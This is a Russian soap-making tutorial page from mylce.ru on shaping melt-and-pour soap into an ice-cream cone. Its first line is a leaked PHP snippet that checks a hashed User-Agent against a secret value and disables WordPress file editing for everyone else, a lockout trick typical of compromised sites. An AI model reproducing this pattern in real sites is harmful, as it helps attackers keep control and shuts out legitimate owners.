if(md5(md5($_SERVER['HTTP_USER_AGENT']))!="c5a3e14ff315cc2934576de76a3766b5"){ define('DISALLOW_FILE_MODS', true); define('DISALLOW_FILE_EDIT', true); } Мастер-класс, как сделать аппетитное мыло-мороженое | Мыло, мыловарение и натуральная косметика в домашних условиях - mylce.ru

Мастер-класс, как сделать аппетитное мыло-мороженое

На этот раз давайте учиться делать красивое мыло в форме мороженного. Выглядеть будет очень аппетитно!

На этот раз давай­те учить­ся делать кра­си­вое мыло в фор­ме моро­жен­но­го. Выгля­деть будет очень аппетитно!

Для мыла понадобятся:

  • Мыль­ная осно­ва (про­зрач­ная и белая);
  • Мин­даль­ное масло;
  • Корич­не­вый пигмент;
  • Аро­ма­ти­за­то­ры «Шоко­лад» и «Мали­на»;
  • Спирт, фор­ма, мыль­ная яго­да, мини-миксер.
    вафельная1
  1. Изго­тов­ле­ние «вафель­но­го рож­ка». В рас­топ­лен­ную белую осно­ву доба­вить по две кап­ли пиг­мен­та и аро­ма­ти­за­то­ра «Шоко­лад». Для напол­не­ния мыла полез­ны­ми свой­ства­ми доба­вить несколь­ко капель мас­ла мин­да­ля. Залить в фор­му. Сбрыз­нуть спир­том. Как толь­ко осно­ва немно­го осты­ла, достать ее и свер­нуть в рожок.
    вафельная2
  2. Изго­тов­ле­ние мыль­но­го кре­ма. В рас­топ­лен­ную осно­ву бело­го цве­та доба­вить несколь­ко капель мас­ла мин­да­ля и две кали аро­ма­ти­за­то­ра «Мали­на». Взби­вать полу­чив­шу­ю­ся мас­су до ее двух­крат­но­го уве­ли­че­ния в объ­е­ме. Вылить в «вафель­ный рожок». Вста­вить уже гото­вую ягоду.
    1403166282_11 1403166269_12
    1403166316_17

 


И на последок!

Обязательно нас лайкните! :) И не забудьте вступить в наши группы в популярных соцсетях - вконтакте, одноклассниках или на фейсбуке. А может у вас есть отличный мастер-класс? Тогда скорее поделитесь им и мы вас сильно полюбим! А еще у нас есть специальная страница, на которой написано где можно купить все для мыла - обязательно ее посмотрите!
Автор: Юлия

Обожаю в свободное время заниматься мыловарением. Уже съела на этом целую собаку! Вот теперь спешу поделиться с вами своими работами ;) Читайте все мои записи!